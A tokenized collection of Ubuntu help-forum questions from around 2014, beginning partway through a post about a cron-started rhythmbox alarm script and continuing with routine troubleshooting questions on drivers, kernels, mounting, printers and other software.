'' `` purity ring 's shrines.mp3 '' `` xxyyxx - xxyyxx ( full album ) .mp3 '' `` bonobo/days to come disc 1/ '' `` liquid stranger - babylon outcast ( dj mix ) .mp3 '' `` wisdom - beautiful chillstep.mp3 '' `` sizzlebird - artist mix.mp3 '' `` yann tiersen - amelie soundtrack.mp3 '' `` chillstep mix 2013 vol.3.mp3 '' `` burning snowflakes mix.mp3 '' `` parov stelar - daylight/ '' `` parov stelar - coco/disc 1/ '' `` parov stelar - coco/disc 2/ '' `` seeed/ '' `` salvation 2 hour best of chillstep mix.mp3 '' `` lonely nights wonderful chillstep mix.mp3 '' `` caribou - swim ( full album ) .mp3 '' `` gorillaz plastic beach 2010/ '' `` griechenland/pendulum - hold your colour/ '' `` griechenland/pendulum in silico/ '' `` pendulum - immersion/ '' `` aphex twin - selected ambient works 85-92.mp3 '' `` rjd2 - deadringer ( full album ) .mp3 '' `` solar fields - random friday ( album ) hq.mp3 '' `` deep cuts/ '' `` silent shout/ '' `` gorillaz/ '' `` kosheen/ ( 2002 ) resist/ '' `` dub_fx/everythinks a ripple/ '' `` griechenland/b-complex/ '' ) for ( ( i=0 ; i < 1 ; i++ ) ) ; do choose= $ { music [ $ ( ( $ random % $ { # music [ @ ] } ) ) ] } # check if song is blocked cat /scripts/alertblock | grep `` $ choose '' > /dev/null if [ [ $ ? == 0 ] ] ; then # song is blocked echo `` $ choose is blocked '' i=-1 fi done # write to file , so it ca n't be played the next given days lines=`wc -l < /scripts/alertblock` # cut the last entry tail -n $ ( ( $ days - 1 ) ) /scripts/alertblock > /scripts/.temp cat /scripts/.temp > /scripts/alertblock echo `` $ choose '' > > /scripts/alertblock echo `` $ choose chosen and added to block-list '' echo `` waiting for rhythmbox to start '' rhythmbox-client -- no-present & # ok=false # while [ [ $ ok == false ] ] ; do # rhythmbox-client -- check-running # # if [ [ $ ? == 0 ] ] ; then # ok=true # else # ok=false # fi # done sleep 10 echo $ choose | grep '/ $ ' if [ [ $ ? == 0 ] ] ; then cd `` /home/julian/music/ $ choose '' echo `` clearing queue '' rhythmbox-client -- clear-queue 2 > & 1 # to avoid adding pictures and such crap rhythmbox-client -- enqueue *.mp3 rhythmbox-client -- enqueue *.wav rhythmbox-client -- enqueue *.ogg rhythmbox-client -- enqueue *.flac sleep 2 rhythmbox-client -- play else rhythmbox-client -- no-start -- play-uri= '' /home/julian/music/ $ choose '' 2 > & 1 fi echo `` music player started . have fun ! '' echo `` ************************** '' echo `` * end ( `` `date + ' % d. % m. % y % h : % m'` '' ) * '' echo `` ************************** '' basically the script turns on the monitors ( works perfectly ) adjust the volume ( works perfectly ) chooses a song and adds it to block-list ( works perfectly ) and starts rhythmbox ( meh ... if it would work the add to playqueue and things would work too ... ) in older distributens ( 12.10 until 13.10 ) rhythmbox was starting ( adding display=:0.0 sudo -u julian or starting via rhythmbox-client -- no-present ) but now all these things do n't work anymore . the logfile generated when starting the script from terminal : *********************************** * start ( 28.05.2014 07:56 ) as julian * *********************************** simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined playback channels : mono limits : playback 0 - 31 mono : playback 14 [ 45 % ] [ -25.50db ] [ on ] turning monitors on and waiting 5 seconds . rjd2 - deadringer ( full album ) .mp3 chosen and added to block-list waiting for rhythmbox to start musicplayer startetd . have fun ! ************************** * end ( 28.05.2014 07:56 ) * ************************** rhythmbox starts and plays started by crontab : *********************************** * start ( 28.05.2014 06:50 ) as julian * *********************************** simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined playback channels : mono limits : playback 0 - 31 mono : playback 14 [ 45 % ] [ -25.50db ] [ on ] turning monitors on and waiting 5 seconds . purity ring 's shrines.mp3 chosen and added to block-list waiting for rhythmbox to start ( rhythmbox-client:5655 ) : glib-gio-critical ** : g_dbus_proxy_new_sync : assertion 'g_is_dbus_connection ( connection ) ' failed musicplayer startetd . have fun ! ************************** * end ( 28.05.2014 06:50 ) * ************************** i see the error message here , but i do n't know how to get rid of it . any help would be appreciated . edit : to go one step deeper : there are two interesting questions for me : why does every version behave different with its crontab ? sorry this sardonically question , but what is the reason it is not treated like a typed command of the user ? it 's obvious that one have to add the display=:0.0 statement , but it 's absolutely not obvious to add the xauthority file , moreover , it does n't work anyaway . if rhythmbox starts , then there are two possibilities : 1 . it runs in an own instance , so rhythmbox-client does n't see it . 2 . it runs in an encapsulated instance of lightdm/unity , so the hotkeys on the keyboard are not working and , if closed , the music plays on , but one have to kill it with killall rhythmbox because , starting rhythmbox via unity in any way ( quick-access in audio-panel too ) , creates a second instance . i 'm only guessing now , but i think , the last two points happens because crontab is doing his work not really in the name of the user it is set up . any help would be very appreciated . edit 2014-06-16 : to bring up more info : it seems like , that it is n't even possible to start any graphical interface in 14.04 : 11 8 * * * gnome-terminal 11 8 * * * display=:0.0 gnome-terminal none of the above is working . i 'm pretty sure in 13.04 and 13.10 this worked ... so still investigating ...
473273	14.04 lts unity no longer boots after last 94 mb update	i am running 14.04 lts , unity , on an hp pavillion 15 , 4gbram , 750 gb hdd , i-5 machine , with amd 8600m graphics card built in . i have disabled the dash and all ubuntu spyware . i have been faithfully loading all updates as they appear . this morning it asked for a 94 mb update ( bringing kernel to .27 , i think . now , i can boot , get to login screen , but it freezes after that . keyboard does n't work at that point , but mouse does . i booted into recovery mode , tried to run in generic graphics mode , -- system again froze . i also pressed [ esc ] during boot , but saw nothing strange ; then text disappeared and was replaced by login screen . i am not a hobbyist ; this is a production machine and i have a lot of work to do today . having a standard software update render my machine completely useless ... sigh . perhaps the simplest thing to do would be to revert to the previous configuration . how do i do that ? i can boot into recovery mode . but i have no idea how to proceed . tia for all help . -harry
473275	mysql not working after server reboot ?	because of problem with host company node i migrate from one node to another . now the server is working , but there seems to be a problem with mysql . in directadmin in mysql management i see this message : error connecting to mysql : ca n't connect to local mysql server through socket '/tmp/mysql.sock ' ( 2 ) the websites are running on magento and in that error log file there is a message : no such file or directory lib/zend/db/adapter/pdo/mysql.php is there a way to recover this whitout losing data ? thanks
473279	what does x86 mean for installing a new hardware enablement ( hwe ) stack in 64 bit ubuntu	i 'd like to install 13.10 ( saucy ) hardware enablement ( hwe ) stack to my ubuntu 12.04 ( 64-bit ) because i need a newer linux kernel . this wiki page explains what `` hardware enablement stacks '' are . among other things it says : only the -generic x86 kernel flavor ... will be supported ... also , this answer says : ... this is only recommended for x86 hardware installations ... is x86 here synonymous to 32-bit/i386 architecture ( but not 64-bit/amd64 ) , or is it i386/amd64 ( but not arm ) ? can i install this `` hardware enablement stack '' in a 64-bit/amd64 ubuntu ? will it be supported with future updates ?
473282	ca n't change the access time of a file	i cant change the access time of any file i create . i tried the touch -a , touch -ad , touch -t commands , but the access time in the stat utility stays the same . can you please help me to modify the access time of the file , and the change time [ if possible ] . thank you .
473283	can the mount command mount iso files into virtual drives ?	i was looking over some question here on the site . from what i understood i could mount an iso file in a virtual drive using `` -o loop '' ( the loop option ) . is this true ? ... if it is then i 'm having trouble using it . i was trying this : sudo mount -t iso9660 -o loop /media/*username*/vdvd /home/*username*/desktop/ubuntu-14.04-desktop-i386.iso i 'm trying to mount the ubuntu iso in a virtual drive . i used mount . i specified the type . i used `` the loop option . the first directory is where the file would be mounted and the second is the file itself . i get the output /media/minow/vdvd : is a directory ... it 's like i wan na tell the terminal `` yeah i know ! '' so anyways : d is there something wrong with my command or is it impossible to do this in the first place ?
473286	getting an xdg_runtime_dir not set in the environment error while trying to reload unity !	my unity stopped loading , icons and dash would n't appear . so i searched around here and found the following link . i have tried all the answers provided here unity does n't load , no launcher , no dash appears but the problem is something else . in my case , ubuntu just does n't recognize my display . it gives me `` xdg_runtime_dir not set in the environment '' error when i try to restart unity or even gnome . please try to explain why this might have happened , along with the solution .
473290	wrong hour to wake up with rtcwake	i want my ubuntu 14.04 to shutdown , then wake up 06:00 am with windows . to achieve that task , i edited the grub so the default option is windows , and created this script : sudo su < < eof rtcwake -m mem -t `date + % s -d '' tomorrow 06:00 '' ` shutdown -r now eof but instead of waking up at 06:00 am , i noticed my computer waked up at 02:00 am . note : the bios time is sync with os time . what am i doing wrong with the time ? is there any better option to achieve waht i want ?
473293	after ubuntu 14.04 update geforce does n't work anymore	after i have updated yesterday ubuntu 14.04 in a routine update my nvidia gforce does n't work anymore . i get the login screen but then it does n't continue . mouse pointer is showing , the background image but no contiuation to the full desktop . with ctrl+alt+f1 i can switch to the console but i do n't know , how to continue , how to make an update of the driver for example . dfuring that update the ubuntu-core was updated an i had to reboot after that . can it be , that the driver now does n't fit to the ubuntu update ? how to resolve that now ?
473294	how to install segoi ui font in libre office ( ubuntu12.04 )	i wants to use segeo ui font in my lib re office but unable to add the font ... .please give me the step by step procedure to add the font in ubuntu 14.04
473295	for cuda installation on ubuntu14 which .deb file to select	i want to install cuda on my dell inspiron which have the gpu gt750 , and ubuntu14 can any body suggest me which .deb file i should select from the nvidia.com/download . i can find .deb file for ubuntu 13.04 and ubuntu 12.04 but my system is running ubuntu14 please guide me what should i do ?
473301	do i remove install disk whenasked to restart	i am a new user . i am loading ubuntu14.04lts onto a toshiba tecra m5 with 3g ram 2,16g centrimo nvidia quadro nvs11om graphic . i am installing with a dvd , so bootup set to cd-rom to start install in bios when install completes it wants to restart the computer . do i remove the install dvd and reset boot to hdd on restart or leave as is and let it restart and reset boot later thanks
473303	canon ir 2420 l printer driver	how to install canon ir 2420 l printer drivers in ubuntu 14.04 ? there are no printer drivers available for ubuntu 14.04 . the same printer drivers were working in ubuntu 12.04 .
473308	only mkv format available in handbrake	i am running ubuntu 14.04 lts 32 bit . i have installed handbrake rev5474 ( i686 ) , which i believe is the latest , and the ubuntu restricted extras . i am able to play dvds via vlc but when it comes to ripping them , so that i can back them up to my twonky media server , i have issues . i launch handbrake and find that the only format available for me to select is mkv . when i used to run handbrake on this machine while i was running ubuntu 13.10 and lower i had no issues and **lots of formats ( including mp4 which is what i 'm really after ) but since reformating and installing 14.04 i 've had this issue . any help would be much appreciated .
473309	login on a webpage via qml-app	i am trying to write an app for ubuntu touch on a nexus 4 using qml and the ubuntu sdk . the app should do what i usually do via internetbrowser : login on a webpage , and then see the data on the next page . how can i write that in qml ? thank you very much !
473310	12.04 system ( authenticate password )	made a new user account and made it administrative but forgot to make a password and want to install some apps and it is asking to authenticate and in the accounts information the password is disable
473311	ppa without upgrades	i just installed smartgithg via ppa : eugenesan/ppa . after an upgrade and restart the whole window style got broken and i ca n't switch to my preferred keyboard layout . may be some other errors occured as well . the problem is that this ppa has tons of packages that my system alter in a way i do n't want them to do . i just want to install smartgithg and get updates via apt . so the question is : how to add ppa and just install one package and may be some requirements but do not use this ppa for upgrades ? for now i ppa-purged the ppa . the system is now working again . i 'm wondering why smartgithg is still installed . anyways i wo n't get updates for it.. regards
473312	/usr/bin/x eating all the cpu	i have ubuntu 12.10 system and it works slow . for checking i ran htop command and found out that /usr/bin/x -nocursor :0 -core -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -n eating all the cpu . it is utilizing upto 90-96 % cpu . i tired to findout reason behind this but i did n't get any specific reason . can any one tell me why this happening ?
473313	does the ubuntu upload oops to kernelopps.org ?	i would like my kernel oops to be send to http : //kerneloops.org . ubuntu uses whoopsie/apport to intercept these crashes but sends them to https : //daisy.ubuntu.com . does whoopsie/apport send these oops to http : //kerneloops.org as well ? how can i configure it to do so ?
473318	how can i enable syntax highlighting in a python file without an extension ?	turning on syntax highlighting in nano is simple enough but i 've just run into a non-standard issue . i have an executable python script that does n't have an extension . it 's part of a virtualenv environment so here 's how it starts : # ! /usr/bin/env python # -*- coding : utf-8 -*-
473323	ssh access failure from ubuntu to windows xp freesshd	i installed 2 vms on virtualbox . vm 1 : windows xp with freesshd and putty installed.ip address : 10.0.0.2 vm 2 : ubuntu 12.04 lts server edition with openssh installed.ip address : 10.0.0.3 from vm 1 , i run putty with the ip address of vm 2 ( 10.0.0.3 ) and port number 22 . i get prompted to input the username and password of vm 2 and everything works fine.from vm 2 , i run on the terminal ( ubuntu ) : ssh username_of_vm1 @ 10.0.0.2 , i get prompted to enter the password of vm 1 . i do so , but it says my password is invalid ( while it is the correct one ) . i even deactived the firewall on vm 1 , but still the problem is here : my password is not accepted from vm 2 . is this due to some settings maybe i must do on vm 1 ( windows xp ) so as i can access it with ssh ? maybe it has something to do with the firewall of windows xp ? important information : ping 10.0.0.2 from vm 1 and ping 10.0.0.3 from vm 2 are working successfully .
473324	problem with opening deluge	whenever i click on deluge bit torrent client . it does n't open if i try it to open from terminal by typing $ deluge it shows following error [ error ] 13:56:02 ipcinterface:156 deluge restart failed : could n't listen on any : /home/iamukt/.config/deluge/ipc/deluge-gtk : can not acquire lock .
473325	three screens with nvidia video card and intel hd graphics ?	i have a nvidia video card , but also a built in intel hd graphics . on windows i can do 3 screens with 2 screens on the nvidia and the third on the intel card . is this also possible in ubuntu ? because ubuntu does n't detect the third screen . i have ubuntu 14.0 .
473326	increasing mouse-key acceleration	i 've searched around , but i can not find anything telling me how to adjust the mouse-key speed . is there a menu i 'm missing , or a command i can type in to change this ?
473328	how do i get the structural images bkchem produces to satisfy these conditions on wikipedia ?	i 'd like to know how to get bkchem to create structural images that satisfy these conditions .
473334	error while loading shared libraries : libmysqlclient.so.15 : can not open shared object file : no such file or directory	i 'm with this error when i execute my db_server **root @ v-8966 : /home/talisman/db # ./db_server ./db_server : error while loading shared libraries : libmysqlclient.so.15 : can not open shared object file : no such file or directory anyone can help me ?
473338	parse git log by modified files	i have been told to make git messages for each modified file all one line so i can use grep to find all changes to that file . for instance : $ git commit -a modified : path/to/file.cpp/.h - 1 ) change1 , 2 ) change2 , etc ... ... $ git log | grep path/to/file.cpp/.h modified : path/to/file.cpp/.h - 1 ) change1 , 2 ) change2 , etc ... ... modified : path/to/file.cpp/.h - 1 ) change1 , 2 ) change2 , etc ... ... modified : path/to/file.cpp/.h - 1 ) change1 , 2 ) change2 , etc ... ... that 's great , but then the actual line is harder to read because it either runs off the screen or wraps and wraps and wraps . if i want to make messages like this : $ git commit -a modified : path/to/file.cpp/.h 1 ) change1 2 ) change2 etc ... ... is there a good way to then use grep or cut or some other tool to get a readout like $ git log | grep path/to/file.cpp/.h modified : path/to/file.cpp/.h 1 ) change1 2 ) change2 etc ... ... modified : path/to/file.cpp/.h 1 ) change1 2 ) change2 etc ... ... modified : path/to/file.cpp/.h 1 ) change1 2 ) change2 etc ... ...
473339	how do i fix the configuration for monitors ?	i 'm new to ubuntu and i 've been using it for about 2 weeks now and i have the following problem : i installed the nvidia driver version 331.38 . then i restarted the computer and after i logged-in a dialog popped up with the following error message : could not apply the stored configuration for monitors - error on line 1 char 1 : document must begin will an element ( e.g < book > ) any suggestions on how to proceed ?
473342	bluez 5.19 ps4 controller	i currently have a problem when pairing my computer with a ps4 remote . on my ubuntu 14.04 i removed everything related with bluez and bluetooth , and i built and installed bluez 5.19 . here are some useful command outputs : jean @ system ~ hcitool hcitool - hci tool ver 5.19 jean @ system ~ hcitool dev devices : hci0 00:15:83:4c:0c : bb jean @ system ~ bluetoothctl [ bluetooth ] # version version 5.19 jean @ system ~ bluetoothctl [ new ] controller 00:15:83:4c:0c : bb bluez [ default ] jean @ system ~ lsusb bus 003 device 012 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) so here is what happens . when i try to hard pair the controller with the computer , by holding the share and ps button for a while , everything works as expected and the pairing is done properly . after a hard pairing if i try the pairing by pressing the ps button only , nothings happen . in order to go it , i first power up the bluetooth dongle : jean @ system ~ sudo hciconfig hcix up and then i run the bluetooh deamon bluetoothd : jean @ system /usr/libexec/bluetooth ~ ./bluetoothd -d -n bluetoothd [ 11270 ] : bluetooth daemon 5.19 bluetoothd [ 11270 ] : src/main.c : parse_config ( ) parsing main.conf bluetoothd [ 11270 ] : src/main.c : parse_config ( ) discovto=0 bluetoothd [ 11270 ] : src/main.c : parse_config ( ) pairto=0 bluetoothd [ 11270 ] : src/main.c : parse_config ( ) auto_to=60 bluetoothd [ 11270 ] : src/main.c : parse_config ( ) name= % h- % d bluetoothd [ 11270 ] : src/main.c : parse_config ( ) class=0x000100 bluetoothd [ 11270 ] : src/main.c : parse_config ( ) key file does not have key 'deviceid' bluetoothd [ 11270 ] : src/gatt.c : gatt_init ( ) starting gatt server bluetoothd [ 11270 ] : src/adapter.c : adapter_init ( ) sending read version command bluetoothd [ 11270 ] : starting sdp server bluetoothd [ 11270 ] : src/sdpd-service.c : register_device_id ( ) adding device id record for 0002:1d6b:0246:0513 ... bluetoothd [ 11270 ] : src/adapter.c : adapter_service_insert ( ) /org/bluez/hci0 bluetoothd [ 11270 ] : src/adapter.c : add_uuid ( ) sending add uuid command for index 0 bluetoothd [ 11270 ] : profiles/audio/a2dp.c : a2dp_sink_server_probe ( ) path /org/bluez/hci0 bluetoothd [ 11270 ] : profiles/audio/a2dp.c : a2dp_source_server_probe ( ) path /org/bluez/hci0 bluetoothd [ 11270 ] : src/adapter.c : btd_adapter_unblock_address ( ) hci0 00:00:00:00:00:00 bluetoothd [ 11270 ] : src/adapter.c : get_ltk_info ( ) a4:15:66 : c1:0d:2a bluetoothd [ 11270 ] : src/device.c : device_create_from_storage ( ) address a4:15:66 : c1:0d:2a bluetoothd [ 11270 ] : src/device.c : device_new ( ) address a4:15:66 : c1:0d:2a bluetoothd [ 11270 ] : src/device.c : device_new ( ) creating device /org/bluez/hci0/dev_a4_15_66_c1_0d_2a bluetoothd [ 11270 ] : src/device.c : device_set_bonded ( ) bluetoothd [ 11270 ] : src/adapter.c : get_ltk_info ( ) a4:15:66:88:5e:9a bluetoothd [ 11270 ] : src/device.c : device_create_from_storage ( ) address a4:15:66:88:5e:9a bluetoothd [ 11270 ] : src/device.c : device_new ( ) address a4:15:66:88:5e:9a bluetoothd [ 11270 ] : src/device.c : device_new ( ) creating device /org/bluez/hci0/dev_a4_15_66_88_5e_9a bluetoothd [ 11270 ] : src/device.c : device_set_bonded ( ) bluetoothd [ 11270 ] : src/adapter.c : load_link_keys ( ) hci0 keys 2 debug_keys 0 bluetoothd [ 11270 ] : src/adapter.c : load_ltks ( ) hci0 keys 0 bluetoothd [ 11270 ] : src/adapter.c : load_connections ( ) sending get connections command for index 0 bluetoothd [ 11270 ] : src/adapter.c : adapter_service_insert ( ) /org/bluez/hci0 bluetoothd [ 11270 ] : src/adapter.c : add_uuid ( ) sending add uuid command for index 0 bluetoothd [ 11270 ] : src/adapter.c : set_did ( ) hci0 source 2 vendor 1d6b product 246 version 513 bluetoothd [ 11270 ] : src/adapter.c : adapter_register ( ) adapter /org/bluez/hci0 registered bluetoothd [ 11270 ] : src/adapter.c : set_dev_class ( ) sending set device class command for index 0 bluetoothd [ 11270 ] : src/adapter.c : set_name ( ) sending set local name command for index 0 bluetoothd [ 11270 ] : src/adapter.c : set_mode ( ) sending set mode command for index 0 bluetoothd [ 11270 ] : src/adapter.c : set_mode ( ) sending set mode command for index 0 bluetoothd [ 11270 ] : src/adapter.c : adapter_start ( ) adapter /org/bluez/hci0 has been enabled bluetoothd [ 11270 ] : src/adapter.c : trigger_passive_scanning ( ) bluetoothd [ 11270 ] : plugins/hostname.c : property_changed ( ) static hostname : system bluetoothd [ 11270 ] : plugins/hostname.c : property_changed ( ) pretty hostname : bluetoothd [ 11270 ] : plugins/hostname.c : update_name ( ) name : system bluetoothd [ 11270 ] : src/adapter.c : adapter_set_name ( ) name : system bluetoothd [ 11270 ] : plugins/hostname.c : property_changed ( ) chassis : desktop bluetoothd [ 11270 ] : plugins/hostname.c : update_class ( ) major : 0x01 minor : 0x01 bluetoothd [ 11270 ] : src/adapter.c : load_link_keys_complete ( ) link keys loaded for hci0 bluetoothd [ 11270 ] : src/adapter.c : load_ltks_complete ( ) ltks loaded for hci0 bluetoothd [ 11270 ] : src/adapter.c : get_connections_complete ( ) connection count : 0 and then i press the ps button of the ps4 controller bluetoothd [ 11270 ] : src/adapter.c : connected_callback ( ) hci0 device a4:15:66 : c1:0d:2a connected eir_len 5 bluetoothd [ 11270 ] : profiles/input/server.c : connect_event_cb ( ) incoming connection from a4:15:66 : c1:0d:2a on psm 17 bluetoothd [ 11270 ] : profiles/input/device.c : input_device_set_channel ( ) idev ( nil ) psm 17 bluetoothd [ 11270 ] : refusing input device connect : no such file or directory ( 2 ) bluetoothd [ 11270 ] : profiles/input/server.c : confirm_event_cb ( ) bluetoothd [ 11270 ] : refusing connection from a4:15:66 : c1:0d:2a : unknown device bluetoothd [ 11270 ] : src/adapter.c : dev_disconnected ( ) device a4:15:66 : c1:0d:2a disconnected , reason 3 bluetoothd [ 11270 ] : src/adapter.c : adapter_remove_connection ( ) bluetoothd [ 11270 ] : plugins/policy.c : disconnect_cb ( ) reason 3 bluetoothd [ 11270 ] : src/adapter.c : bonding_attempt_complete ( ) hci0 bdaddr a4:15:66 : c1:0d:2a type 0 status 0xe bluetoothd [ 11270 ] : src/device.c : device_bonding_complete ( ) bonding ( nil ) status 0x0e bluetoothd [ 11270 ] : src/device.c : device_bonding_failed ( ) status 14 bluetoothd [ 11270 ] : src/adapter.c : resume_discovery ( ) so i do n't know what is happening here and a bit of help would be appreciated .
473343	problem with org.freedesktop.geoclue.providers.hostip , running qreator on xubuntu-14.04	i installed qreator using apt-get on xubuntu-14.04 : $ sudo apt-get install qreator but the application fails to start ! when i try to run it via terminal , the following error messages are printed and the program aborts : $ qreator ** ( qreator:3859 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-gh2fphrmr2 : connection refused no handlers could be found for logger `` qreator_lib '' traceback ( most recent call last ) : file `` /usr/bin/qreator '' , line 47 , in < module > qreator.main ( ) file `` /usr/lib/python2.7/dist-packages/qreator/__init__.py '' , line 63 , in main window = qreatorwindow.qreatorwindow ( ) file `` /usr/lib/python2.7/dist-packages/qreator_lib/window.py '' , line 48 , in __new__ new_object.finish_initializing ( builder ) file `` /usr/lib/python2.7/dist-packages/qreator/qreatorwindow.py '' , line 79 , in finish_initializing self.init_qr_types ( ) file `` /usr/lib/python2.7/dist-packages/qreator/qreatorwindow.py '' , line 135 , in init_qr_types self.qr_types = [ d ( self.update_qr_code ) for d in qrcodetype.dataformats ] file `` /usr/lib/python2.7/dist-packages/qreator/qrcodes/qrcodetype.py '' , line 71 , in __init__ self.create_widget ( ) # pylint : disable=e1101 file `` /usr/lib/python2.7/dist-packages/qreator/qrcodes/qrcodelocation.py '' , line 29 , in create_widget self.widget = qrcodelocationgtk ( self.qr_code_update_func ) file `` /usr/lib/python2.7/dist-packages/qreator/qrcodes/qrcodelocationgtk.py '' , line 49 , in __init__ latitude , longitude = get_current_location ( ) file `` /usr/lib/python2.7/dist-packages/qreator/qrcodes/qrcodelocationgtk.py '' , line 109 , in get_current_location '/org/freedesktop/geoclue/providers/hostip ' ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.geoclue.providers.hostip was not provided by any .service files how can i fix this ?
473345	software center not opening at all error	when i open software from menu , it says `` can not open software database . please reinstall the software-center package . when i write software-center on terminal , such error comes : 2014-05-28 09:11:20,584 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-05-28 09:11:20,593 - softwarecenter.ui.gtk3.app - error - xapian open failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 302 , in __init__ if self.db.schema_version ( ) ! = db_schema_version : file `` /usr/share/software-center/softwarecenter/db/database.py '' , line 289 , in schema_version return self.xapiandb.get_metadata ( `` db-schema-version '' ) file `` /usr/share/software-center/softwarecenter/db/database.py '' , line 177 , in xapiandb self._db_per_thread [ thread_name ] = self._get_new_xapiandb ( ) file `` /usr/share/software-center/softwarecenter/db/database.py '' , line 190 , in _get_new_xapiandb xapiandb = xapian.database ( self._db_pathname ) file `` /usr/lib/python2.7/dist-packages/xapian/__init__.py '' , line 3667 , in __init__ _xapian.database_swiginit ( self , _xapian.new_database ( *args ) ) databasecorrupterror : /var/cache/software-center/xapian/iamchert : chert version file should be 28 bytes , actually 0 now , when i write command sudo apt-get remove software-center dpkg : error : corrupt info database format file '/var/lib/dpkg/info/format' e : sub-process /usr/bin/dpkg returned an error code ( 2 ) i had ubuntu before but it kind of got corrupted . now , i have freshly reinstalled it and even at start , software center is not opening and this error comes . i hope you have a solution . thanks .
473349	lubuntu 14.04 graphics problem on portege r100	first of all i have to say that i am not an expert . i have installed lubuntu 14.04 on my portege r100 . the problem is that the graphics session does not start . actually i can do all but only by command line . i try to start xsession but nothing happens . actually by typing startx the system stop to works . i read several threads on this topic but i did not find such kind of problem . there is something similar about portege r100 concerning lowgraphics mode but the porblem i have seems to be different because graphics session does not start . can anyone help me ? thank you best
473350	unable to access maas nodes	i am trying to access to maas nodes . i can not access them with ubuntu user nor ssh from maas server . i 've added ssh key in maas web interface . i need to install virsh onto them , but i can not even access them anyway . thanks in advance : )
473353	changing the passphrase ( cryptsetup )	i encrypted the hdds of my laptop where i installed ubuntu using cryptsetup i want to change the passphrase . this forum says i must add a key before deleting the old one . but i am not using a keyfile ( aparently ) . how can i change the passphrase ? p.s . these answers do not work for me .
473354	how to mark some file in debian package as config ?	i want to make my own debian package , which contains some default config file . i do n't want this file to be rewritten after update with dpkg -i . what are the ways to solve my problem ?
473356	how to keep specific old kernel on my next kernel upgrade ?	i just updated my ubuntu 14.04 and got a new kernel . this new kernel is not working properly for me so i booted the previous version . let 's call this good old working version `` 3.13.0-24.47 '' . now , i want to keep this `` 3.13.0-24.47 '' version until i decide to delete it manually . i want to be able to upgrade my kernel each time there is a new version in hope of getting the one which works again . until then , i want to use the `` 3.13.0-24.47 '' . i 'm afraid that next update will delete my `` 3.13.0-24.47 '' version because there are only two kernel versions available at a given time on my system ( /boot ) .
473358	nagios remote execution problem libc-so-6-version-glibc-2-14-not-found	i have installed nagios core 4 on ubuntu server 12.04 lts.. everything working fine , , but ... i have a problem with remote command to a remote linux ( ubuntu server 12.04 ) pc ! when i try to check a service , for example : check_swap , check_disk etc.. i got everytime an error : remote command execution failed : /home/nagios/plugins/check_disk : /lib/x86_64-linux-gnu/libc.so.6 : version `glibc_2.14 ' not found ( required by /home/nagios/plugins/check_disk ) the remote pc is not my pc and i do n't want to make a disaster ! : ) so ... how can i fix this problem ? any help be appreciate ! ! ! ; ) thanks in advance ! : )
473359	library for audio files	i have written a project in matlab , using some signal processing ( fft , convolution , psd etc ) , and i have to put it on ubuntu , for that i need to write a project in c , and i was wondering if there is a library that can help me to do those taks in ubuntu or in linux in general . thanks in advance for any hint !
473365	the installation process of ubuntu does not see windows xp system	i 'm trying to install ubuntu but it does not see i 've got windows xp already installed and as this is our first time trying linux we do n't want to get rid of xp yet hoping for a low tech solution or a walkthrough .
473367	ubuntu 14.04 hangs at purple screen after it asks for my password	i have installed ubuntu 14.04lts onto a toshiba tecra m5 . the install appears to have been successful but when it says `` install complete restart your computer '' the computer does not restart . it just sits there , then after a forced shut down ubuntu appears to start , icons appear in the top right hand corner of the screen but after it asks for my password it just hangs up on the purple screen . can anyone help ?
473369	what is wrong with booting the pc with boot command acpi=off ?	sorry , but i am really new at this and want to pick it up ! ... i would like to know what boot commands really are and what is wrong if we boot our pc with enabling acpi=off ?
473372	no signal message on acer veritp pc monitor	our library purchased five new acer verito desktop pcs . we have installed ubuntu 14.04 with existing windows 7 ( dual boot ) . restarted system after the installation of ubuntu 14.04 . everything works ( including internet connection ) fine for 30 minutes . monitor turned to blank and a message shows `` no input siganl '' . i changed grub start up to text mode by disturbing grub . now i can enter into desktop but no internet connection available . i installed 12.04 over ubuntu 14.04 ubuntu . ubuntu 12.04 installed successfully but no internet connection . how can i solve this problem ?
473373	system-config-printer broken after update to 14.04	after i upgraded to ubuntu 14.04 the dialog system-config-printer in gnome runs into problems when called from the command line : sudo system-config-printer traceback ( most recent call last ) : file `` /usr/share/system-config-printer/system-config-printer.py '' , line 72 , in < module > from gi.repository import gobject # for type_string and type_pyobject file `` /usr/lib/python2.7/dist-packages/gi/__init__.py '' , line 32 , in < module > raise importerror ( 'when using gi.repository you must not import static ' importerror : when using gi.repository you must not import static modules like `` gobject '' . please change all occurrences of `` import gobject '' to `` from gi.repository import gobject '' . the problem persisted when i tried to change the suggested imports in the package , i.e. , cd /usr/share/system-config-printer sed -i 's/import gobject/from gi.repository import gobject/g ' *.py sed -i 's/gobject/gobject/g ' *.py thanks for your help .
